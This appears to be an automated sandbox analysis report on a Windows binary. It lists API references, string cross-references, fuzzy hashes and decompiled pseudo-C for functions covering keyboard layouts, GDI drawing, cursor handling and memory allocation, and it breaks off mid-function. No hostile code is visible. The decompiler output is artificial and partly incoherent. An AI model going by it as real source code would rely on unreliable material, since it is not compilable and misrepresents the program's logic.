                                                                              • Part of subcall function 0040DDC0: LoadLibraryA.KERNEL32(00000000,00000000,0040DE14,?,00000000,0040DE32), ref: 0040DDF9
                                                                            • GetProcAddress.KERNEL32(?,KbdLayerDescriptor), ref: 00433575
                                                                            • FreeLibrary.KERNEL32(?,004335AF,?,00000000,00000000,004335EF), ref: 004335A2
                                                                            Strings
                                                                            • Layout File , xrefs: 00433541
                                                                            • \SYSTEM\CurrentControlSet\Control\Keyboard Layouts\ , xrefs: 00433529
                                                                            • KbdLayerDescriptor , xrefs: 0043356C
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: Library$AddressCloseErrorFreeKeyboardLayoutLoadModeNameOpenProc
                                                                            • String ID: KbdLayerDescriptor$Layout File$\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\
                                                                            • API String ID: 3365787578-2194312379
                                                                            • Opcode ID: 30fe6d65afb9ff2c8a4add937bd16555c20e8b1eadddcbf00d4f0d828bd5cc06
                                                                            • Instruction ID: b7f935374733f2b043a6a9212af3645c2f8cc5f46ad59cc71e04b143bdb154a3
                                                                            • Opcode Fuzzy Hash: 30fe6d65afb9ff2c8a4add937bd16555c20e8b1eadddcbf00d4f0d828bd5cc06
                                                                            • Instruction Fuzzy Hash: 9221B2B0E00209BFCB01EFA5C85299EBBB6EB8D704F518476F400A7750D77DAA41CB58
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 56%
                                                                                                                                  E004231B8(intOrPtr _a4, intOrPtr* _a8) { 				void _v20; 				void* __ebx; 				void* __edi; 				void* __esi; 				void* __ebp; 				void* _t24; 				int _t25; 				intOrPtr _t27; 				intOrPtr _t28; 				intOrPtr* _t30; 				intOrPtr* _t32;  				_t30 = _a8; 				_t28 = _a4; 				if( *0x46633e != 0) { 					_t25 = 0; 					if(_t28 == 0x12340042 && _t30 != 0 &&  *_t30 >= 0x28 && SystemParametersInfoA(0x30, 0,  &_v20, 0) != 0) { 						 *((intOrPtr*)(_t30 + 4)) = 0; 						 *((intOrPtr*)(_t30 + 8)) = 0; 						 *((intOrPtr*)(_t30 + 0xc)) = GetSystemMetrics(0); 						 *((intOrPtr*)(_t30 + 0x10)) = GetSystemMetrics(1); 						asm("movsd"); 						asm("movsd"); 						asm("movsd"); 						asm("movsd"); 						_t32 = _t30; 						 *(_t32 + 0x24) = 1; 						if( *_t32 >= 0x48) { 							lstrcpyA(_t32 + 0x28, "DISPLAY"); 						} 						_t25 = 1; 					} 				} else { 					_t27 =  *0x466328; // 0x4231b8 					 *0x466328 = E00422CE4(6, _t24, _t27, _t28, _t30); 					_t25 =  *0x466328(_t28, _t30); 				} 				return _t25; 			}                        


                                                                            APIs
                                                                            • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00423210
                                                                            • GetSystemMetrics.USER32 ref: 00423225
                                                                            • GetSystemMetrics.USER32 ref: 00423230
                                                                            • lstrcpyA.KERNEL32(?,DISPLAY), ref: 0042325A
                                                                              • Part of subcall function 00422CE4: GetProcAddress.KERNEL32(768F0000,00000000), ref: 00422D63
                                                                            Strings
                                                                            • GetMonitorInfoW , xrefs: 004231D0
                                                                            • DISPLAY , xrefs: 00423251
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: System$Metrics$AddressInfoParametersProclstrcpy
                                                                            • String ID: DISPLAY$GetMonitorInfoW
                                                                            • API String ID: 2545840971-2774842281
                                                                            • Opcode ID: ef46426c222f0a8c5ab6ef8e0efa3e8c781f7b32c898a96ae6b7654e867d441d
                                                                            • Instruction ID: 96bab24b47e879cbfe0bd9bf5b7a96c5a668f0bc15fc1324eeb591fd9e87288a
                                                                            • Opcode Fuzzy Hash: ef46426c222f0a8c5ab6ef8e0efa3e8c781f7b32c898a96ae6b7654e867d441d
                                                                            • Instruction Fuzzy Hash: 5B119071B00320AED720CF65AC447A7B7A8EB05721F40456AED4597350D6B8BA44CBA9
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 75%
                                                                                                                                  E00428588(int __eax, void* __ecx, intOrPtr __edx) { 				intOrPtr _v8; 				struct HDC__* _v12; 				struct HDC__* _v16; 				void* _v20; 				struct tagRGBQUAD _v1044; 				int _t16; 				int _t37; 				intOrPtr _t44; 				void* _t46; 				void* _t49; 				void* _t51; 				intOrPtr _t52;  				_t16 = __eax; 				_t49 = _t51; 				_t52 = _t51 + 0xfffffbf0; 				_v8 = __edx; 				_t46 = __eax; 				if(__eax == 0 ||  *((short*)(__ecx + 0x26)) > 8) { 					L4: 					return _t16; 				} else { 					_t16 = E004273B0(_v8, 0xff,  &_v1044); 					_t37 = _t16; 					if(_t37 == 0) { 						goto L4; 					} else { 						_v12 = GetDC(0); 						_v16 = CreateCompatibleDC(_v12); 						_v20 = SelectObject(_v16, _t46); 						_push(_t49); 						_push(0x428637); 						_push( *[fs:eax]); 						 *[fs:eax] = _t52; 						SetDIBColorTable(_v16, 0, _t37,  &_v1044); 						_pop(_t44); 						 *[fs:eax] = _t44; 						_push(0x42863e); 						SelectObject(_v16, _v20); 						DeleteDC(_v16); 						return ReleaseDC(0, _v12); 					} 				} 			}                        


                                                                            APIs
                                                                              • Part of subcall function 004273B0: GetObjectA.GDI32(?,00000004), ref: 004273C7
                                                                              • Part of subcall function 004273B0: GetPaletteEntries.GDI32(?,00000000,?,?), ref: 004273EA
                                                                            • GetDC.USER32(00000000), ref: 004285C6
                                                                            • CreateCompatibleDC.GDI32(?), ref: 004285D2
                                                                            • SelectObject.GDI32(?), ref: 004285DF
                                                                            • SetDIBColorTable.GDI32(?,00000000,00000000,?,00000000,00428637,?,?,?,?,00000000), ref: 00428603
                                                                            • SelectObject.GDI32(?,?), ref: 0042861D
                                                                            • DeleteDC.GDI32(?), ref: 00428626
                                                                            • ReleaseDC.USER32 ref: 00428631
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: Object$Select$ColorCompatibleCreateDeleteEntriesPaletteReleaseTable
                                                                            • String ID:
                                                                            • API String ID: 4046155103-0
                                                                            • Opcode ID: 0ef47c05c1142c1c4212e51049af1cabbe0614bb78c017c0a708da15428bdc0c
                                                                            • Instruction ID: fc760d696f5b6bfeae7a67bf9a168a54974abfe34dfe22b54ea61c4cebc6b826
                                                                            • Opcode Fuzzy Hash: 0ef47c05c1142c1c4212e51049af1cabbe0614bb78c017c0a708da15428bdc0c
                                                                            • Instruction Fuzzy Hash: 72119371E052186BDB10EBE9DC51EAEB3FCEF08704F4144BAB614E7680DA799D508B68
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 94%
                                                                                                                                  E00454B28(struct HICON__* __eax, short __edx) { 				short _v18; 				long _v20; 				struct tagPOINT _v28; 				struct HICON__* _t11; 				long _t16; 				struct HICON__* _t25; 				struct HWND__* _t28; 				short _t29; 				struct tagPOINT* _t31;  				_t11 = __eax; 				_t29 = __edx; 				_t25 = __eax; 				if(__edx ==  *((intOrPtr*)(__eax + 0x44))) { 					L6: 					 *((intOrPtr*)(_t25 + 0x48)) =  *((intOrPtr*)(_t25 + 0x48)) + 1; 					return _t11; 				} 				 *((short*)(__eax + 0x44)) = __edx; 				if(__edx != 0) { 					L5: 					_t11 = SetCursor(E00454B00(_t25, _t29)); 					goto L6; 				} 				GetCursorPos(_t31); 				_push(_v28.y); 				_t28 = WindowFromPoint(_v28.x); 				if(_t28 == 0) { 					goto L5; 				} 				_t16 = GetWindowThreadProcessId(_t28, 0); 				if(_t16 != GetCurrentThreadId()) { 					goto L5; 				} 				_v20 = _v28 & 0x0000ffff; 				_v18 = _v28.y & 0x0000ffff; 				return SendMessageA(_t28, 0x20, _t28, SendMessageA(_t28, 0x84, 0, _v20) & 0x0000ffff | 0x02000000); 			}                        


                                                                            APIs
                                                                            • GetCursorPos.USER32 ref: 00454B43
                                                                            • WindowFromPoint.USER32(?,?), ref: 00454B50
                                                                            • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00454B5E
                                                                            • GetCurrentThreadId.KERNEL32 ref: 00454B65
                                                                            • SendMessageA.USER32(00000000,00000084,00000000,?), ref: 00454B8E
                                                                            • SendMessageA.USER32(00000000,00000020,00000000,?), ref: 00454BA0
                                                                            • SetCursor.USER32(00000000), ref: 00454BB2
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: CursorMessageSendThreadWindow$CurrentFromPointProcess
                                                                            • String ID:
                                                                            • API String ID: 1770779139-0
                                                                            • Opcode ID: 9f5a7c3084286db833192a4aa11ff27d7912034fd2b50688e769e3f1ee89cca9
                                                                            • Instruction ID: 855e5610ba6024dcea5ecb996c65caa1e9501b556084f3035492505de70d9607
                                                                            • Opcode Fuzzy Hash: 9f5a7c3084286db833192a4aa11ff27d7912034fd2b50688e769e3f1ee89cca9
                                                                            • Instruction Fuzzy Hash: 9E01D63150824066C6207B668C81F3B36A4DFC4B59F10446FBE88AA2D2E63DEC44936E
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 89%
                                                                                                                                  E0044F90C(intOrPtr* __eax, void* __ebx, intOrPtr* __edx, void* __edi, void* __esi) { 				intOrPtr* _v8; 				intOrPtr* _v12; 				struct HDC__* _v16; 				struct tagPAINTSTRUCT _v80; 				struct tagRECT _v96; 				struct tagRECT _v112; 				signed int _v116; 				long _v120; 				void* __ebp; 				void* _t68; 				void* _t94; 				struct HBRUSH__* _t97; 				intOrPtr _t105; 				void* _t118; 				void* _t127; 				intOrPtr _t140; 				intOrPtr _t146; 				void* _t147; 				void* _t148; 				void* _t150; 				void* _t152; 				intOrPtr _t153;  				_t148 = __esi; 				_t147 = __edi; 				_t138 = __edx; 				_t127 = __ebx; 				_t150 = _t152; 				_t153 = _t152 + 0xffffff8c; 				_v12 = __edx; 				_v8 = __eax; 				_t68 =  *_v12 - 0xf; 				if(_t68 == 0) { 					_v16 =  *(_v12 + 4); 					if(_v16 == 0) { 						 *(_v12 + 4) = BeginPaint( *(_v8 + 0x29c),  &_v80); 					} 					_push(_t150); 					_push(0x44fada); 					_push( *[fs:eax]); 					 *[fs:eax] = _t153; 					if(_v16 == 0) { 						GetWindowRect( *(_v8 + 0x29c),  &_v96); 						E0043A55C(_v8,  &_v120,  &_v96); 						_v96.left = _v120; 						_v96.top = _v116; 						E00439028( *(_v12 + 4),  ~(_v96.top),  ~(_v96.left)); 					} 					L0043FDA8(_v8, _t127, _v12, _t147, _t148); 					_pop(_t140); 					 *[fs:eax] = _t140; 					_push(0x44fae8); 					if(_v16 == 0) { 						return EndPaint( *(_v8 + 0x29c),  &_v80); 					} 					return 0; 				} else { 					_t94 = _t68 - 5; 					if(_t94 == 0) { 						_t97 = E004261BC( *((intOrPtr*)(_v8 + 0x1a4))); 						 *((intOrPtr*)( *_v8 + 0x44))(); 						FillRect( *(_v12 + 4),  &_v112, _t97); 						if( *((char*)(_v8 + 0x277)) == 2 &&  *(_v8 + 0x29c) != 0) { 							GetClientRect( *(_v8 + 0x29c),  &_v96); 							FillRect( *(_v12 + 4),  &_v96, E004261BC( *((intOrPtr*)(_v8 + 0x1a4)))); 						} 						_t105 = _v12; 						 *((intOrPtr*)(_t105 + 0xc)) = 1; 					} else { 						_t118 = _t94 - 0x2b; 						
if(_t118 == 0) { 							E0044F880(_t150); 							_t105 = _v8; 							if( *((char*)(_t105 + 0x277)) == 2) { 								if(E00450190(_v8) == 0 || E0044F8CC(_t138, _t150) == 0) { 									_t146 = 1; 								} else { 									_t146 = 0; 								} 								_t105 = E0044C934( *(_v8 + 0x29c), _t146); 							} 						} else { 							if(_t118 != 0x45) { 								_t105 = E0044F880(_t150); 							} else { 								E0044F880(_t150); 								_t105 = _v12; 								if( *((intOrPtr*)(_t105 + 0xc)) == 1) { 									_t105 = _v12; 									 *((intOrPtr*)(_t105 + 0xc)) = 0xffffffff; 								} 							} 						} 					} 					return _t105; 				} 			}                        

                                                                            APIs
                                                                            • FillRect.USER32 ref: 0044F985
                                                                            • GetClientRect.USER32 ref: 0044F9B0
                                                                            • FillRect.USER32 ref: 0044F9CF
                                                                              • Part of subcall function 0044F880: CallWindowProcA.USER32 ref: 0044F8BA
                                                                            • BeginPaint.USER32(?,?), ref: 0044FA47
                                                                            • GetWindowRect.USER32 ref: 0044FA74
                                                                            • EndPaint.USER32(?,?,0044FAE8), ref: 0044FAD4
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: Rect$FillPaintWindow$BeginCallClientProc
                                                                            • String ID:
                                                                            • API String ID: 901200654-0
                                                                            • Opcode ID: d94346d578d3ee0884cb281a283a1a4aa21f630484195cd9280e2cea34370f60
                                                                            • Instruction ID: 44bf8864a589ba947b4fad5018ef312e79812de65eda3363066782ea35254d35
                                                                            • Opcode Fuzzy Hash: d94346d578d3ee0884cb281a283a1a4aa21f630484195cd9280e2cea34370f60
                                                                            • Instruction Fuzzy Hash: A851EB74A00108EFDB00DBA9D589E9EB7F8AF09314F6581B6E409AB352D738AE45CB15
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 81%
E00427660(intOrPtr* __eax, void* __ebx, signed int __ecx, intOrPtr __edx, void* __edi, void* __esi, signed int* _a4, signed int* _a8) {
    intOrPtr* _v8;
    intOrPtr _v12;
    signed int _v16;
    intOrPtr _v20;
    signed int _v24;
    signed int _v32;
    struct HDC__* _v44;
    signed int* _t36;
    signed int _t39;
    signed int _t42;
    signed int* _t52;
    signed int _t56;
    intOrPtr _t66;
    void* _t72;
    void* _t73;
    void* _t74;
    intOrPtr _t75;

    _t73 = _t74;
    _t75 = _t74 + 0xffffff90;
    _v16 = __ecx;
    _v12 = __edx;
    _v8 = __eax;
    _t52 = _a8;
    _v24 = _v16 << 4;
    _v20 = E00402CF4(_v24);
    *[fs:edx] = _t75;
    _t56 = _v24;
    *((intOrPtr*)( *_v8 + 0xc))( *[fs:edx], 0x427959, _t73, __edi, __esi, __ebx, _t72);
    if(( *_t52 | _t52[1]) != 0) {
        _t36 = _a4;
        *_t36 =  *_t52;
        _t36[1] = _t52[1];
    } else {
        *_a4 = GetSystemMetrics(0xb);
        _a4[1] = GetSystemMetrics(0xc);
    }
    _v44 = GetDC(0);
    if(_v44 == 0) {
        E00426B18(_t56);
    }
    _push(_t73);
    _push(0x427749);
    _push( *[fs:edx]);
    *[fs:edx] = _t75;
    _t39 = GetDeviceCaps(_v44, 0xe);
    _t42 = _t39 * GetDeviceCaps(_v44, 0xc);
    if(_t42 <= 8) {
        _v32 = 1 << _t42;
    } else {
        _v32 = 0x7fffffff;
    }
    _pop(_t66);
    *[fs:eax] = _t66;
    _push(0x427750);
    return ReleaseDC(0, _v44);
}

                                                                            APIs
                                                                            • GetSystemMetrics.USER32 ref: 004276AE
                                                                            • GetSystemMetrics.USER32 ref: 004276BA
                                                                            • GetDC.USER32(00000000), ref: 004276D6
                                                                            • GetDeviceCaps.GDI32(00000000,0000000E), ref: 004276FD
                                                                            • GetDeviceCaps.GDI32(00000000,0000000C), ref: 0042770A
                                                                            • ReleaseDC.USER32 ref: 00427743
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: CapsDeviceMetricsSystem$Release
                                                                            • String ID:
                                                                            • API String ID: 447804332-0
                                                                            • Opcode ID: 6db74f019e932430a5205a3f000c479cbdd6ede7329f90984af2c91e504fd773
                                                                            • Instruction ID: 73986ba3f22e50cd3a10517d1b4e47993adae367a89b78d8e0850655de09d4be
                                                                            • Opcode Fuzzy Hash: 6db74f019e932430a5205a3f000c479cbdd6ede7329f90984af2c91e504fd773
                                                                            • Instruction Fuzzy Hash: 72314374E04255DFEB00DF65C881AAEBBF5FB49310F50816AF914AB381C678AD41CB69
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 67%
E00427AC0(struct HBITMAP__* __eax, void* __ebx, struct tagBITMAPINFO* __ecx, struct HPALETTE__* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, void* _a8) {
    char _v5;
    struct HPALETTE__* _v12;
    struct HDC__* _v16;
    struct tagBITMAPINFO* _t36;
    intOrPtr _t43;
    struct HBITMAP__* _t47;
    void* _t50;
    void* _t56;

    _t36 = __ecx;
    _t47 = __eax;
    E0042796C(__eax, _a4, __ecx, _t56);
    _v12 = 0;
    _v16 = CreateCompatibleDC(0);
    _push(_t50);
    _push(0x427b5d);
    _push( *[fs:eax]);
    *[fs:eax] = _t50 + 0xfffffff4;
    if(__edx != 0) {
        _v12 = SelectPalette(_v16, __edx, 0);
        RealizePalette(_v16);
    }
    _v5 = GetDIBits(_v16, _t47, 0, _t36->bmiHeader.biHeight, _a8, _t36, 0) != 0;
    _pop(_t43);
    *[fs:eax] = _t43;
    _push(E00427B64);
    if(_v12 != 0) {
        SelectPalette(_v16, _v12, 0);
    }
    return DeleteDC(_v16);
}

                                                                            APIs
                                                                              • Part of subcall function 0042796C: GetObjectA.GDI32(?,00000054), ref: 00427980
                                                                            • CreateCompatibleDC.GDI32(00000000), ref: 00427AE2
                                                                            • SelectPalette.GDI32(?,00000000,00000000), ref: 00427B03
                                                                            • RealizePalette.GDI32(?), ref: 00427B0F
                                                                            • GetDIBits.GDI32(?,?,00000000,?,?,?,00000000), ref: 00427B26
                                                                            • SelectPalette.GDI32(?,00000000,00000000), ref: 00427B4E
                                                                            • DeleteDC.GDI32(?), ref: 00427B57
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: Palette$Select$BitsCompatibleCreateDeleteObjectRealize
                                                                            • String ID:
                                                                            • API String ID: 1221726059-0
                                                                            • Opcode ID: 8627611f152e7c7c56902325a297cebd820d38512f5a8e1b8c5b3a113364f492
                                                                            • Instruction ID: 962af5e7cc7204e74324ac0cd40ad7ab2ef4d8fef8aaa126dedc15750c7fb750
                                                                            • Opcode Fuzzy Hash: 8627611f152e7c7c56902325a297cebd820d38512f5a8e1b8c5b3a113364f492
                                                                            • Instruction Fuzzy Hash: C2118F75B04304BBDB10DBA9CC81F5EBBFCEF49704F5184AAB514E7281D678A9008768
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
E0042730C(void* __eax, signed short __ecx) {
    char _v1036;
    signed short _v1038;
    struct tagRGBQUAD _v1048;
    short _v1066;
    void* __ebx;
    void* _t19;
    void* _t24;
    struct HDC__* _t25;
    void* _t29;
    void* _t32;
    struct HPALETTE__* _t34;
    LOGPALETTE* _t35;

    _t32 = __eax;
    _t34 = 0;
    _t35->palVersion = 0x300;
    if(__eax == 0) {
        _v1038 = __ecx;
        E00402EFC(_t29, _t24, __ecx + __ecx + __ecx + __ecx,  &_v1036);
    } else {
        _t25 = CreateCompatibleDC(0);
        _t19 = SelectObject(_t25, _t32);
        _v1066 = GetDIBColorTable(_t25, 0, 0x100,  &_v1048);
        SelectObject(_t25, _t19);
        DeleteDC(_t25);
    }
    if(_v1038 != 0) {
        if(_v1038 != 0x10 || E00427274(_t35) == 0) {
            E00427108( &_v1036, _v1038 & 0x0000ffff);
        }
        _t34 = CreatePalette(_t35);
    }
    return _t34;
}

                                                                            APIs
                                                                            • CreateCompatibleDC.GDI32(00000000), ref: 00427325
                                                                            • SelectObject.GDI32(00000000,00000000), ref: 0042732E
                                                                            • GetDIBColorTable.GDI32(00000000,00000000,00000100,?,00000000,00000000,00000000,00000000,?,?,00429843,?,?,?,?,00428423), ref: 00427342
                                                                            • SelectObject.GDI32(00000000,00000000), ref: 0042734E
                                                                            • DeleteDC.GDI32(00000000), ref: 00427354
                                                                            • CreatePalette.GDI32 ref: 0042739B
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: CreateObjectSelect$ColorCompatibleDeletePaletteTable
                                                                            • String ID:
                                                                            • API String ID: 2515223848-0
                                                                            • Opcode ID: c89457fef7e00606ab67b15f21780a14b5c4b4e76221054ff810e7252926fb92
                                                                            • Instruction ID: 4a95b8b0959ba2db041035c6acb415e503d43549d7c2ca44117eec6569594a82
                                                                            • Opcode Fuzzy Hash: c89457fef7e00606ab67b15f21780a14b5c4b4e76221054ff810e7252926fb92
                                                                            • Instruction Fuzzy Hash: 4501C46130C32062E614B3269C43B6F72F89FC0718F55C82FB989A72C2E67D8804939E
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
E004269F4(void* __eax) {
    void* _t36;

    _t36 = __eax;
    UnrealizeObject(E004261BC( *((intOrPtr*)(__eax + 0x14))));
    SelectObject( *(_t36 + 4), E004261BC( *((intOrPtr*)(_t36 + 0x14))));
    if(E0042629C( *((intOrPtr*)(_t36 + 0x14))) != 0) {
        SetBkColor( *(_t36 + 4),  !(E00425400(E00426180( *((intOrPtr*)(_t36 + 0x14))))));
        return SetBkMode( *(_t36 + 4), 1);
    } else {
        SetBkColor( *(_t36 + 4), E00425400(E00426180( *((intOrPtr*)(_t36 + 0x14)))));
        return SetBkMode( *(_t36 + 4), "true");
    }
}

                                                                            APIs
                                                                              • Part of subcall function 004261BC: CreateBrushIndirect.GDI32(?), ref: 00426267
                                                                            • UnrealizeObject.GDI32(00000000), ref: 00426A00
                                                                            • SelectObject.GDI32(?,00000000), ref: 00426A12
                                                                            • SetBkColor.GDI32(?,00000000), ref: 00426A35
                                                                            • SetBkMode.GDI32(?,?), ref: 00426A40
                                                                            • SetBkColor.GDI32(?,00000000), ref: 00426A5B
                                                                            • SetBkMode.GDI32(?,00000001), ref: 00426A66
                                                                              • Part of subcall function 00425400: GetSysColor.USER32(E8C38BD6), ref: 0042540A
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: Color$ModeObject$BrushCreateIndirectSelectUnrealize
                                                                            • String ID:
                                                                            • API String ID: 3527656728-0
                                                                            • Opcode ID: 7ad58a4a7fab2d505cb020bb7c2f8009f6a27285ca724472cc6bf081660a7e3f
                                                                            • Instruction ID: 79df315320e9c6d7b3654dfc87e14d29fd340cea2b97e5c1a1a8a26441f2275c
                                                                            • Opcode Fuzzy Hash: 7ad58a4a7fab2d505cb020bb7c2f8009f6a27285ca724472cc6bf081660a7e3f
                                                                            • Instruction Fuzzy Hash: 98F06BB57001109BDB04FFBAE9C6E1B6BA85F04309755449AB909DF197C939E8208739
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 67%
                                                                                                                                  E00401820(signed int __eax) { 				signed int __ebx; 				signed int __edi; 				signed int __esi; 				intOrPtr* _t99; 				signed int _t104; 				signed int _t109; 				signed int _t110; 				intOrPtr* _t114; 				void* _t116; 				intOrPtr* _t121; 				signed int _t125; 				signed int _t129; 				signed int _t131; 				signed int _t132; 				signed int _t133; 				signed int _t134; 				signed int _t135; 				unsigned int _t141; 				signed int _t142; 				void* _t144; 				intOrPtr* _t147; 				intOrPtr _t148; 				signed int _t150; 				long _t156; 				intOrPtr _t159; 				signed int _t162;  				_t129 =  *0x46304d; // 0x0 				if(__eax > 0xa2c) { 					__eflags = __eax - 0x40a2c; 					if(__eax > 0x40a2c) { 						_pop(_t120); 						__eflags = __eax; 						if(__eax >= 0) { 							_push(_t120); 							_t162 = __eax; 							_t156 = __eax + 0x00010010 - 0x00000001 + 0x00000004 & 0xffff0000; 							_t121 = VirtualAlloc(0, _t156, 0x101000, 4); 							if(_t121 != 0) { 								_t147 = _t121; 								 *((intOrPtr*)(_t147 + 8)) = _t162; 								 *(_t147 + 0xc) = _t156 | 0x00000004; 								E00401740(); 								_t99 =  *0x4657b0; // 0x4657ac 								 *_t147 = 0x4657ac; 								 *0x4657b0 = _t121; 								 *((intOrPtr*)(_t147 + 4)) = _t99; 								 *_t99 = _t121; 								 *0x4657a8 = 0; 								_t121 = _t121 + 0x10; 							} 							return _t121; 						} else { 							__eflags = 0; 							return 0; 						} 					} else { 						_t125 = (__eax + 0x000000d3 & 0xffffff00) + 0x30; 						__eflags = _t129; 						if(__eflags != 0) { 							while(1) { 								asm("lock cmpxchg [0x463718], ah"); 								if(__eflags == 0) { 									goto L39; 								} 								Sleep(0); 								asm("lock cmpxchg [0x463718], ah"); 								if(__eflags != 0) { 									Sleep(0xa); 									continue; 								} 								goto L39; 							} 						} 						L39: 						_t141 = _t125 - 0xb30; 						_t142 = _t141 
